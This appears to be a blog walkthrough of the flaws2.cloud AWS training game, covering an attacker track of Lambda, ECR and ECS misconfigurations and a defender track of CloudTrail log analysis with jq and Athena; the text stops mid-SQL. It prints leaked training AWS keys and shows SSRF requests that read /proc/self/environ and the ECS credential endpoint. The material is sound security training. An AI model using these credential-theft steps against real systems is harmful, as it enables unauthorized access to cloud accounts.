Flaws2.cloud Walkthrough: AWS Cloud Security

KISHORERAM
20 min read · Jan 25, 2024


Introduction

Welcome to our exploration of the cloud! We’re looking at flaws.cloud, a fun and useful training ground for AWS users. The built-in hints make it a practical learning experience for beginners, but even seasoned professionals can find it challenging to complete without them.

After the success of flaws.cloud, we now have flaws2.cloud. This new version focuses on serverless technologies, and you can choose to play as a Red team member or a Blue team member. Let’s dive in and learn more about these platforms.

Flaws 2 has two paths this time: Attacker and Defender! In the Attacker path, you’ll exploit your way through misconfigurations in serverless functions (Lambda) and containers (ECS Fargate). In the Defender path, that same application is the victim: you’ll work as an incident responder, given the logs of a previous successful attack, and piece together how it happened. Along the way you’ll learn the power of jq for analyzing logs and how to set up Athena in your own environment.

Attacker

In this path as an attacker, you’ll exploit your way through misconfigurations in Lambda (serverless functions) and containers in ECS Fargate.

Level 1

For this level, you’ll need to enter the correct PIN code. The correct PIN is 100 digits long, so brute forcing it won’t help.

I tried entering a random code, and it returned "Incorrect. Try again."

I then tried entering some non-numeric characters, and it popped an alert box saying "Code must be a number". That was interesting, so I looked into the source code.

<script type="text/javascript">
function validateForm() {
    var code = document.forms["myForm"]["code"].value;
    if (!(!isNaN(parseFloat(code)) && isFinite(code))) {
        alert("Code must be a number");
        return false;
    }
}
</script>

There is basic validation JavaScript in the source code. Level 1 - Hint 1 confirms that the input validation is done only by this JavaScript, so we can get around it and pass a PIN code that isn’t a number. We can simply submit a non-numeric value such as 'a' in the form and capture the request in Burp Suite to see the response. I also noticed the form submits to https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1; visiting that URL directly gave me an internal server error.
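If you prefer to skip Burp Suite, the same bypass can be reproduced with curl. This is a minimal sketch assuming the form submits the PIN as a code query parameter to the API Gateway URL above, which is what the captured request shows:

curl "https://2rfismmoo8.execute-api.us-east-1.amazonaws.com/default/level1?code=a"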

Now let’s look at the request captured in Burp Suite for the non-numeric form input, so we can see how the server responds.

As I guessed, the result is an error caused by the malformed input, and that error gives us a ton of data we should not have access to.

AWS_SESSION_TOKEN:IQoJb3JpZ2luX2VjEHAaCXVzLWVhc3QtMSJGMEQCIHgsXLZBVf2LFTTEuIajSmFDazfTgwBFtzgTGvMOgRYxAiAb27TuikmI+un2tBCO5o6ALcsCTVYnn0N/lMJ/PExXAyrgAggpEAMaDDY1MzcxMTMzMTc4OCIMbE0ZbEc9kTPAPQaAKr0CsyR9+OtqumvVZIkc5mBE/i/WuVUDwzcn19JsEPjZ6DpWhOy4ZOjkNbmBeyIeGlWNw4UCm4Gd7RIGRUcL9ZllDelz9AGfEpP4bMcfptJyo0Rvzcd51FtRY0DKOovYs99zL/wV5amwDGyWHG6m9ST6SozWdlbf35OIUQyYCPsdz5vd631MRqtaBSfus4VRBmpny8oaANQnOqb2eTWUMqGw+bxp2TT+SXiyoxP5fMfXa28Yzl6zQHX1ivCYnrW9F0yRnLWqNFdYeTJbN41rOIvQELAEqIf6LSONx5AFeFMTD5L4Hf05EgZ4NbeC8EyNG/G+SNv/h87IACeqlQmnW6fhetnKQXrAh/u7xWkXVKX5GbGcu4m1Rrc8C1LC9N5CIcMXubAvf32UIyqPtQg5wS5UySUAxUXxcqICOaxW6Z4wmpezrQY6nwHQz+qXvvrBNs7f4QD67FB/HSJibBMazEdatgzYOvTnG0GXyDmfp1t1Q235UpE5D6ffXikMtaA7mlcexTGXLsbwmYAhQzUPeuLQjcEL9/d/AedbKtOqGJXfnERL4fk6fZjZIfKaUh7hS84O+yd8G6rX0jaNaCzA63ogfpdY1qWI2JA5zjmKRjqVJHmWhXWWEA9wrf4vDo3ZR9RHZNrShiQ=
AWS_ACCESS_KEY_ID:ASIAZQNB3KHGL7QJFTUW
AWS_SECRET_ACCESS_KEY:Vb8mkvzVQU7fxTXlCX3h27mbNnhc7i+byt3TAxCq
AWS_REGION:us-east-1
_AWS_XRAY_DAEMON_ADDRESS:169.254.79.129
AWS_XRAY_DAEMON_ADDRESS:169.254.79.129:2000

Here is the full error response for reference. Let’s copy this data into an online JSON formatter to make it more readable.

{
"_AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129",
"LD_LIBRARY_PATH": "/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib",
"AWS_XRAY_DAEMON_ADDRESS": "169.254.79.129:2000",
"AWS_SESSION_TOKEN": "IQoJb3JpZ2luX2VjEHAaCXVzLWVhc3QtMSJGMEQCIHgsXLZBVf2LFTTEuIajSmFDazfTgwBFtzgTGvMOgRYxAiAb27TuikmI+un2tBCO5o6ALcsCTVYnn0N/lMJ/PExXAyrgAggpEAMaDDY1MzcxMTMzMTc4OCIMbE0ZbEc9kTPAPQaAKr0CsyR9+OtqumvVZIkc5mBE/i/WuVUDwzcn19JsEPjZ6DpWhOy4ZOjkNbmBeyIeGlWNw4UCm4Gd7RIGRUcL9ZllDelz9AGfEpP4bMcfptJyo0Rvzcd51FtRY0DKOovYs99zL/wV5amwDGyWHG6m9ST6SozWdlbf35OIUQyYCPsdz5vd631MRqtaBSfus4VRBmpny8oaANQnOqb2eTWUMqGw+bxp2TT+SXiyoxP5fMfXa28Yzl6zQHX1ivCYnrW9F0yRnLWqNFdYeTJbN41rOIvQELAEqIf6LSONx5AFeFMTD5L4Hf05EgZ4NbeC8EyNG/G+SNv/h87IACeqlQmnW6fhetnKQXrAh/u7xWkXVKX5GbGcu4m1Rrc8C1LC9N5CIcMXubAvf32UIyqPtQg5wS5UySUAxUXxcqICOaxW6Z4wmpezrQY6nwHQz+qXvvrBNs7f4QD67FB/HSJibBMazEdatgzYOvTnG0GXyDmfp1t1Q235UpE5D6ffXikMtaA7mlcexTGXLsbwmYAhQzUPeuLQjcEL9/d/AedbKtOqGJXfnERL4fk6fZjZIfKaUh7hS84O+yd8G6rX0jaNaCzA63ogfpdY1qWI2JA5zjmKRjqVJHmWhXWWEA9wrf4vDo3ZR9RHZNrShiQ=",
"AWS_LAMBDA_LOG_GROUP_NAME": "/aws/lambda/level1",
"AWS_LAMBDA_FUNCTION_NAME": "level1",
"AWS_LAMBDA_FUNCTION_VERSION": "$LATEST",
"AWS_XRAY_CONTEXT_MISSING": "LOG_ERROR",
"AWS_LAMBDA_INITIALIZATION_TYPE": "on-demand",
"AWS_REGION": "us-east-1",
"AWS_SECRET_ACCESS_KEY": "Vb8mkvzVQU7fxTXlCX3h27mbNnhc7i+byt3TAxCq",
"LAMBDA_TASK_ROOT": "/var/task",
"LAMBDA_RUNTIME_DIR": "/var/runtime",
"AWS_ACCESS_KEY_ID": "ASIAZQNB3KHGL7QJFTUW",
"LANG": "en_US.UTF-8",
"AWS_DEFAULT_REGION": "us-east-1",
"AWS_LAMBDA_RUNTIME_API": "127.0.0.1:9001",
"AWS_LAMBDA_FUNCTION_MEMORY_SIZE": "128",
"_HANDLER": "index.handler",
"AWS_EXECUTION_ENV": "AWS_Lambda_nodejs8.10",
"PATH": "/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin",
"_AWS_XRAY_DAEMON_PORT": "2000",
"AWS_LAMBDA_LOG_STREAM_NAME": "2024/01/21/[$LATEST]ec39de8eca41495a8158dcf0cff5c7ab",
"TZ": ":UTC",
"NODE_PATH": "/opt/nodejs/node8/node_modules:/opt/nodejs/node_modules:/var/runtime/node_modules:/var/runtime:/var/task:/var/runtime/node_modules",
"_X_AMZN_TRACE_ID": "Root=1-65acccb2-198751986691bca97d3eb148;Parent=6b11cc056d9bb12a;Sampled=0;Lineage=e547cb94:0"
}

As observed in the data above, we now have access to environment variables that happen to contain AWS credentials. With these credentials, I can create an AWS profile to get access to the underlying AWS infrastructure.

Add the AWS access key, secret key, and session token to the ~/.aws/credentials file.
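A sketch of the ~/.aws/credentials entry, using the values leaked above (the profile name flaws2 is arbitrary, and the long session token is abbreviated here; paste the full AWS_SESSION_TOKEN value):

[flaws2]
aws_access_key_id = ASIAZQNB3KHGL7QJFTUW
aws_secret_access_key = Vb8mkvzVQU7fxTXlCX3h27mbNnhc7i+byt3TAxCq
aws_session_token = IQoJb3JpZ2luX2VjEHAaCXVzLWVhc3QtMSJG...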

To discover the account ID, we can run:

aws --profile flaws2 sts get-caller-identity

I got an error,
An error occurred (InvalidClientTokenId) when calling the GetCallerIdentity operation: The security token included in the request is invalid.

By googling, I found an answer on Stack Overflow: https://stackoverflow.com/questions/34582318/how-can-i-resolve-the-error-the-security-token-included-in-the-request-is-inval

If you have been given a Session Token also, then you need to manually set it after configure:

aws configure set aws_session_token "<<your session token>>"

That resolved the issue for me.

These credentials can now be used to list the contents of the bucket.
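For example, assuming the level1 site is served from an S3 bucket named after its hostname (as in the original flaws.cloud):

aws --profile flaws2 s3 ls s3://level1.flaws2.cloud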

Listing the bucket reveals secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html, so we visit http://level1.flaws2.cloud/secret-ppxVFdwV4DDtZm8vbQRvhxL8mE6wxNco.html to reach the next level.

Lesson learned

Whereas EC2 instances obtain the credentials for their IAM roles from the metadata service at 169.254.169.254 (as you learned in flaws.cloud Level 5), AWS Lambda obtains those credentials from environmental variables. Often developers will dump environmental variables when error conditions occur in order to help them debug problems. This is dangerous as sensitive information can sometimes be found in environmental variables.

Another problem is that the IAM role had privileges to list the contents of a bucket, which wasn’t needed for its operation. Best practice is to follow a least-privilege strategy: give services only the minimal privileges in their IAM policies that they need to accomplish their purpose. To identify what a role actually uses, you can look at AWS CloudTrail logs (leveraged by Duo Security’s CloudTracker) or AWS Access Advisor (leveraged by Netflix’s RepoKid).

Finally, you shouldn’t rely on input validation happening only on the client side or at some point upstream from your code. AWS applications, especially serverless ones, are composed of many building blocks chained together, and developers sometimes assume that something upstream has already performed input validation. In this case, the client data was validated by JavaScript, which could be bypassed; it was then passed into API Gateway and finally to the Lambda. Applications are often more complex than that, and these architectures can change over time, possibly breaking assumptions about where validation is supposed to occur.

Level 2 - Containers and Environmental Variables

This next level is running as a container at http://container.target.flaws2.cloud/. Just like S3 buckets, other resources on AWS can have open permissions. I’ll give you a hint that the ECR (Elastic Container Registry) is named “level2”.

Amazon Elastic Container Registry (ECR) is a fully managed Docker container registry from Amazon Web Services (AWS) that stores, manages, and deploys container images. It uses Amazon Simple Storage Service (S3) for storage to make container images highly available and accessible, and it integrates with Amazon Elastic Container Service (ECS), which simplifies the development-to-production workflow. AWS Fargate is a technology you can use with Amazon ECS to run containers without having to manage servers or clusters of Amazon EC2 instances. With Fargate, you no longer have to provision, configure, or scale clusters of virtual machines; you can run containers on demand without worrying about capacity planning, scaling, or patching.

In this level we will list the images in the registry, since the ECR repository is public, and then use either Docker or the AWS CLI to inspect the contents of the image. Docker images are composed of layers, which are intermediate build stages of the image; each line in a Dockerfile results in the creation of a new layer.

Enumerating ECR, we find the list of images available in the repository named level2, using the registry ID (account ID) found in the previous level via get-caller-identity.
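The enumeration looks like this (653711331788 is the account ID returned by get-caller-identity):

aws --profile flaws2 ecr list-images --repository-name level2 --registry-id 653711331788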

Now that you know the image is public, you have two choices, you can either download it locally with docker pull and investigate it with Docker commands or do things more manually with the AWS CLI.

Option 1: Using the docker commands

Source: https://dockerlabs.collabnix.com/

Pull the image from the repository; we can verify it has been pulled by checking the list of images present in our local repository.
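A sketch of the pull, assuming AWS CLI v2's get-login-password flow and the repository URI built from the account ID and region found earlier:

aws --profile flaws2 ecr get-login-password --region us-east-1 | docker login --username AWS --password-stdin 653711331788.dkr.ecr.us-east-1.amazonaws.com
docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest
docker images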

The docker inspect command is used to get detailed information about Docker objects: images, containers, networks, volumes, and so on. Inspecting an image returns its configuration, layers, and other metadata, including the list of all the layers that make up the image, which is useful for troubleshooting or for understanding how the image was built. Each line in a Dockerfile results in the creation of a new layer.
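For example, to pull just the layer digests out of the inspect output (the jq filter here is purely illustrative):

docker inspect 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest | jq '.[0].RootFS.Layers'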

The docker history command shows the history of the specified image, i.e. the instructions that built each layer.
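The untruncated history shows every instruction that built the image, which is where interesting secrets tend to hide:

docker history --no-trunc 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest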

From the image history we can find what we need to log in to the container at http://container.target.flaws2.cloud/.

The docker run command is used to create and run a container based on a specified Docker image. It allows users to instantiate isolated and portable environments, encapsulating an application and its dependencies, and supports options for port mappings, volume mounts, environment variables, and more.

sudo docker run -ti -p 8000:8000 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2 bash

This command uses elevated privileges (sudo) to execute Docker, creates a container based on the specified image, allocates a pseudo-TTY for interactive access (-ti), maps port 8000 from the host to the container, and starts a Bash shell within the container.

We can find the link for the next level in /var/www/html/index.htm.

Option 2: Using the AWS CLI

You can also analyse the image using the AWS CLI together with the jq command-line utility. jq is a lightweight and flexible command-line JSON processor, written in portable C with zero runtime dependencies, that can slice, filter, map, and transform structured data.

Here, aws ecr batch-get-image is used to retrieve details about a container image from the ECR repository named level2 in the registry with ID 653711331788. The --image-ids flag specifies which image to retrieve, using the latest tag. The output is piped into jq, where '.images[].imageManifest | fromjson' extracts the imageManifest field from each returned image and converts it from a JSON string into a JSON object. In short, this retrieves information about the latest image in the level2 repository, and jq formats the manifest into readable JSON.
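Putting that together (the flaws2 profile is the one configured in Level 1):

aws --profile flaws2 ecr batch-get-image --repository-name level2 --registry-id 653711331788 --image-ids imageTag=latest | jq '.images[].imageManifest | fromjson'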

Each layer in a container image represents a set of file system changes, and the layerDigest is a cryptographic hash, often using the SHA-256 algorithm, that uniquely identifies the content and structure of that layer. The layerDigest is crucial for ensuring the integrity of container images. When you pull an image, the container runtime uses the layerDigest to verify the content of each layer. If any part of a layer is altered, the layerDigest would change, indicating that the image has been tampered with or corrupted.
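As a sketch, an individual layer can then be fetched by its digest, which returns a pre-signed download URL (substitute any layerDigest value from the manifest):

aws --profile flaws2 ecr get-download-url-for-layer --repository-name level2 --registry-id 653711331788 --layer-digest <layerDigest from the manifest>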

Level 3

Lesson learned

There are lots of other resources on AWS that can be public, but they are harder to brute-force because you have to include not only the name of the resource, but also the Account ID and region. They also can’t be searched via DNS records. However, it is still best to avoid having public resources.

Level 3 challenge

The container’s webserver you got access to includes a simple proxy that can be accessed at http://container.target.flaws2.cloud/proxy/http://flaws.cloud or http://container.target.flaws2.cloud/proxy/http://neverssl.com

Containers running via ECS on AWS have their credentials at 169.254.170.2/v2/credentials/GUID, where the GUID is found in the environment variable AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.
On Linux systems, the environment variables for a process can often be found in /proc/self/environ. So: use http://container.target.flaws2.cloud/proxy/file:///proc/self/environ to read the GUID, then use it to access something like http://container.target.flaws2.cloud/proxy/http://169.254.170.2/v2/credentials/468f6417-4361-4690-894e-3d03a0394609. Use those credentials to run aws s3 ls and list the buckets in the account.
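A minimal sketch of that final step, assuming the credentials endpoint returns the usual AccessKeyId, SecretAccessKey, and Token fields:

export AWS_ACCESS_KEY_ID=<AccessKeyId from the credentials response>
export AWS_SECRET_ACCESS_KEY=<SecretAccessKey from the credentials response>
export AWS_SESSION_TOKEN=<Token from the credentials response>
aws s3 ls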

Defender Track

Welcome Defender! As an incident responder we’re granting you access to the AWS account called “Security” as an IAM user. This account contains a copy of the logs during the time period of the incident and has the ability to assume into the “Security” role in the target account so you can look around to spot the misconfigurations that allowed for this attack to happen.
The Defender track won’t include challenges like the Attacker track, and instead will walk you through key skills for doing security work on AWS. The objectives are:

  • Objective 1: Download CloudTrail logs
  • Objective 2: Access the Target account
  • Objective 3: Use jq
  • Objective 4: Identify credential theft
  • Objective 5: Identify the public resource
  • Objective 6: Use Athena

Credentials

Your IAM credentials to the Security account:

Environment

The credentials above give you access to the Security account, which can assume the role “security” in the Target account. You also have access to an S3 bucket, named flaws2-logs, in the Security account that contains the CloudTrail logs recorded during a successful compromise from the Attacker track.

Objective 1: Download CloudTrail logs

Step 1: Setup CLI

The first thing we’ll do is download the CloudTrail logs. Do this by configuring the AWS CLI, or try using aws-vault, which avoids storing the keys in plain text in your home directory (a common source of key leakage) the way the AWS CLI does.
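If you go the plain AWS CLI route, a minimal setup might look like this (the profile name security is just the name used in the rest of this walkthrough; aws-vault users would run aws-vault add security instead):

aws configure --profile security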

Ensure this worked by running:
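aws --profile security sts get-caller-identity

This should return an ARN in the Security account (account ID 322079859186), assuming you named the profile security as above.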

As mentioned earlier, we can see the list of buckets we have access to, and we can download everything in the bucket using s3 sync for further analysis.

Step 2: Download the logs

Now let’s download the CloudTrail logs with:
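With the flaws2-logs bucket from the environment description above, an s3 sync into the current directory does the job:

aws --profile security s3 sync s3://flaws2-logs .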

The CloudTrail logs are in the subfolder AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/, which contains a number of .json.gz files.

Objective 2: Access the Target account

A common, and best practice, AWS setup is to have a separate Security account that contains the CloudTrail logs from all other AWS accounts and also has some sort of access into the other accounts to check up on things. For this objective, we need to access the Target account through the IAM role that grants the Security account access. In your ~/.aws/config file, you should already have a profile for your security account that looks like:

[profile security]
region=us-east-1
output=json

Now, we'll add a profile for the target to that file:

[profile target_security]
region=us-east-1
output=json
source_profile = security
role_arn = arn:aws:iam::653711331788:role/security

You should now be able to run:

aws --profile target_security sts get-caller-identity

You should get results like this:

{
"Account": "653711331788",
"UserId": "AROAIKRY5GULQLYOGRMNS:botocore-session-1544126021",
"Arn": "arn:aws:sts::653711331788:assumed-role/security/botocore-session-1544126021"
}

The important thing to notice is when your account ID is 322079859186, you are running in the security account, and when it is 653711331788, you are running in the context of the target account.

Run aws --profile target_security s3 ls and you'll see the S3 buckets for the levels of the Attacker path.

Objective 3: Use jq

Let’s start digging into the log data we have. If you don’t already have jq installed, you should install it. https://stedolan.github.io/jq/download/.

All the logs are in AWSLogs/653711331788/CloudTrail/us-east-1/2018/11/28/, but often you will have CloudTrail logs in lots of subdirectories, so it’s helpful to be able to act on them all at once. Assuming your current working directory is the folder where you downloaded these files, and you don’t have anything else there, gunzip the files by running the following, which finds every file in every subdirectory, recursively, and attempts to gunzip it:

find . -type f -exec gunzip {} \;

Now cat them through jq with:

find . -type f -iname "*.json" -exec cat {} \; | jq '.'

You should see nicely formatted JSON data, but it’s a lot of info, so let’s just look at the event names. To print just the eventName field nested under Records, replace the jq query in the command above with:

jq '.Records[]|.eventName'

You should see:

...
"GetObject"
"GetObject"
"ListBuckets"
"AssumeRole"
"AssumeRole"
"BatchGetImage"
"GetDownloadUrlForLayer"
"CreateLogStream"
"CreateLogStream"

These are slightly out of order, so let’s include the time. Replace the jq part with:

find . -type f -iname "*.json" -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .eventName] |@tsv' | sort

You should see:

...
2018-11-28T22:31:59Z AssumeRole
2018-11-28T22:31:59Z AssumeRole
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:56Z GetObject
2018-11-28T23:02:57Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:08Z GetObject
2018-11-28T23:03:11Z GetObject
2018-11-28T23:03:11Z GetObject
2018-11-28T23:03:12Z AssumeRole
2018-11-28T23:03:12Z CreateLogStream

The -c and -r flags print each record compactly as raw text, and the |@tsv makes the output tab-separated. The result is then sorted by time, since that’s the first column.

Extending that even further, we can replace the jq part with:

find . -type f -iname "*.json" -exec cat {} \; | jq -cr '.Records[]|[.eventTime, .sourceIPAddress, .userAgent, .userIdentity.arn, .userIdentity.accountId, .userIdentity.type, .eventName]|@tsv' | sort > events.tsv

You can then copy that into Excel or another spreadsheet which can sometimes make the data easier to work with.

These logs mostly contain the attack, but you’ll also notice logs for “AWSService” events as the Lambda and ECS resources obtained their roles. These are basically logs about how AWS works, not actions anyone took. There are also a lot of ANONYMOUS_PRINCIPAL entries, which are calls that did not involve an AWS principal; in this case, these are S3 requests from a web browser. If you look at the user-agent data (.userAgent) you’ll see them as Chrome, as opposed to the AWS CLI.

Objective 4: Identify credential theft

Let’s work our way backward through the hack by first focusing on the ListBuckets call, which can be found using the jq query:

find . -type f -iname "*.json" -exec cat {} \; | jq '.Records[]|select(.eventName=="ListBuckets")'

The response is:

{
"eventVersion": "1.05",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAJQMBDNUMIKLZKMF64:d190d14a-2404-45d6-9113-4eda22d7f2c7",
"arn": "arn:aws:sts::653711331788:assumed-role/level3/d190d14a-2404-45d6-9113-4eda22d7f2c7",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGNXWXBSJS",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T22:31:59Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAJQMBDNUMIKLZKMF64",
"arn": "arn:aws:iam::653711331788:role/level3",
"accountId": "653711331788",
"userName": "level3"
}
}
},
"eventTime": "2018-11-28T23:09:28Z",
"eventSource": "s3.amazonaws.com",
"eventName": "ListBuckets",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "[aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9]",
"requestParameters": null,
"responseElements": null,
"requestID": "4698593B9338B27F",
"eventID": "65e111a0-83ae-4ba8-9673-16291a804873",
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

You’ll notice the IP here is 104.102.221.250 which is not an Amazon owned IP. In this case it’s the IP of nsa.gov. :) The only data I doctored in the logs was just to hide my home IP. We’ll view this IP as the attacker’s IP.

This call came from the role level3, so let’s look at that:

aws --profile target_security iam get-role --role-name level3

Response:

{
"Role": {
"Path": "/",
"RoleName": "level3",
"RoleId": "AROAJQMBDNUMIKLZKMF64",
"Arn": "arn:aws:iam::653711331788:role/level3",
"CreateDate": "2018-11-23T17:55:27+00:00",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {
"Service": "ecs-tasks.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows ECS tasks to call AWS services on your behalf.",
"MaxSessionDuration": 3600,
"RoleLastUsed": {
"LastUsedDate": "2024-01-06T05:48:54+00:00",
"Region": "us-east-2"
}
}
}

You’ll see this role is only supposed to be used by the ECS service, as the AssumeRolePolicyDocument only allows that Principal, but we just saw that this IP clearly did not come from the AWS IP space (AWS publishes its IP ranges at https://ip-ranges.amazonaws.com/ip-ranges.json).

We don’t have logs from the webserver that is running the ECS container, but we can assume from this one log event that it must have been hacked. Normally, you’d see the resource (the ECS task in this case) making AWS API calls from its own IP, which you could then compare against any new IPs that appear.

Objective 5: Identify the public resource

Looking at earlier events from the CloudTrail logs, we’ll see level1 calling ListImages, BatchGetImage, and GetDownloadUrlForLayer. Again, this is a compromised session credential, but we also want to see what happened here.

ListImages

find . -type f -iname "*.json" -exec cat {} \; | jq '.Records[]|select(.eventName=="ListImages")'
{
"eventVersion": "1.04",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAIBATWWYQXZTTALNCE:level1",
"arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T23:03:12Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAIBATWWYQXZTTALNCE",
"arn": "arn:aws:iam::653711331788:role/service-role/level1",
"accountId": "653711331788",
"userName": "level1"
}
}
},
"eventTime": "2018-11-28T23:05:53Z",
"eventSource": "ecr.amazonaws.com",
"eventName": "ListImages",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
"requestParameters": {
"repositoryName": "level2",
"registryId": "653711331788"
},
"responseElements": null,
"requestID": "2780d808-f362-11e8-b13e-dbd4ed9d7936",
"eventID": "eb0fa4a0-580f-4270-bd37-7e45dfb217aa",
"resources": [
{
"ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
"accountId": "653711331788"
}
],
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

BatchGetImage

find . -type f -exec cat {} \; | jq '.Records[]|select(.eventName=="BatchGetImage")'
{
"eventVersion": "1.04",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAIBATWWYQXZTTALNCE:level1",
"arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T23:03:12Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAIBATWWYQXZTTALNCE",
"arn": "arn:aws:iam::653711331788:role/service-role/level1",
"accountId": "653711331788",
"userName": "level1"
}
}
},
"eventTime": "2018-11-28T23:06:17Z",
"eventSource": "ecr.amazonaws.com",
"eventName": "BatchGetImage",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
"requestParameters": {
"imageIds": [
{
"imageTag": "latest"
}
],
"repositoryName": "level2",
"registryId": "653711331788"
},
"responseElements": null,
"requestID": "35ea9256-f362-11e8-86cf-35c48074ab0a",
"eventID": "b2867f3e-810c-47d1-9657-edb886e03fe6",
"resources": [
{
"ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
"accountId": "653711331788"
}
],
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

GetDownloadUrlForLayer
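Filtered out with the same jq pattern as the previous two events:

find . -type f -iname "*.json" -exec cat {} \; | jq '.Records[]|select(.eventName=="GetDownloadUrlForLayer")'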

{
"eventVersion": "1.04",
"userIdentity": {
"type": "AssumedRole",
"principalId": "AROAIBATWWYQXZTTALNCE:level1",
"arn": "arn:aws:sts::653711331788:assumed-role/level1/level1",
"accountId": "653711331788",
"accessKeyId": "ASIAZQNB3KHGIGYQXVVG",
"sessionContext": {
"attributes": {
"mfaAuthenticated": "false",
"creationDate": "2018-11-28T23:03:12Z"
},
"sessionIssuer": {
"type": "Role",
"principalId": "AROAIBATWWYQXZTTALNCE",
"arn": "arn:aws:iam::653711331788:role/service-role/level1",
"accountId": "653711331788",
"userName": "level1"
}
}
},
"eventTime": "2018-11-28T23:06:33Z",
"eventSource": "ecr.amazonaws.com",
"eventName": "GetDownloadUrlForLayer",
"awsRegion": "us-east-1",
"sourceIPAddress": "104.102.221.250",
"userAgent": "aws-cli/1.16.19 Python/2.7.10 Darwin/17.7.0 botocore/1.12.9",
"requestParameters": {
"layerDigest": "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621",
"repositoryName": "level2",
"registryId": "653711331788"
},
"responseElements": null,
"requestID": "3f96ec7f-f362-11e8-bf5d-3380094c69db",
"eventID": "ff4c72f3-4fbd-45d4-9ee3-3834a78f53de",
"resources": [
{
"ARN": "arn:aws:ecr:us-east-1:653711331788:repository/level2",
"accountId": "653711331788"
}
],
"eventType": "AwsApiCall",
"recipientAccountId": "653711331788"
}

We can check the policy by running:

aws --profile target_security ecr get-repository-policy --repository-name level2

Response:

{
"policyText": "{\n \"Version\" : \"2008-10-17\",\n \"Statement\" : [ {\n \"Sid\" : \"AccessControl\",\n \"Effect\" : \"Allow\",\n \"Principal\" : \"*\",\n \"Action\" : [ \"ecr:GetDownloadUrlForLayer\", \"ecr:BatchGetImage\", \"ecr:BatchCheckLayerAvailability\", \"ecr:ListImages\", \"ecr:DescribeImages\" ]\n } ]\n}",
"repositoryName": "level2",
"registryId": "653711331788"
}

You can clean that up by passing it through jq with jq '.policyText|fromjson', which results in:

aws --profile target_security ecr get-repository-policy --repository-name level2 | jq '.policyText|fromjson'
{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "AccessControl",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr:GetDownloadUrlForLayer",
"ecr:BatchGetImage",
"ecr:BatchCheckLayerAvailability",
"ecr:ListImages",
"ecr:DescribeImages"
]
}
]
}

You can see the Principal is “*”, which means these actions can be performed by anyone in the world, i.e. this ECR repository is public. Ideally, you’d use a tool like CloudMapper to scan an account for public resources like this before you have to trace back an attack.

Objective 6: Use Athena

For this objective, we’ll be exploring the logs in a similar way as we did with jq, by using the AWS Service Athena. You’ll need to do this from your own account, as there isn’t a way I can give untrusted users access to Athena in my account without people doing undesirable things. Athena can be accessed at https://console.aws.amazon.com/athena/home?region=us-east-1#query. We’ll be working with such a small dataset that any charges on your account should be a few pennies. You’ll need Athena and Glue privileges.

In the query editor, run:

create database flaws2;

Switch to the flaws2 database you just created and run:

CREATE EXTERNAL TABLE `cloudtrail`(
`eventversion` string COMMENT 'from deserializer',
`useridentity` struct<type:string,principalid:string,arn:string,accountid:string,invokedby:string,accesskeyid:string,username:string,sessioncontext:struct<attributes:struct<mfaauthenticated:string,creationdate:string>,sessionissuer:struct<type:string,principalid:string,arn:string,accountid:string,username:string>>> COMMENT 'from deserializer',
`eventtime` string COMMENT 'from deserializer',
`eventsource` string COMMENT 'from deserializer',
`eventname` string COMMENT 'from deserializer',
`awsregion` string COMMENT 'from deserializer',
`sourceipaddress` string COMMENT 'from deserializer',
`useragent` string COMMENT 'from deserializer',
`errorcode` string COMMENT 'from deserializer',
`errormessage` string COMMENT 'from deserializer',
`requestparameters` string COMMENT 'from deserializer',
`responseelements` string COMMENT 'from deserializer',
`additionaleventdata` string COMMENT 'from deserializer',
`requestid` string COMMENT 'from deserializer',
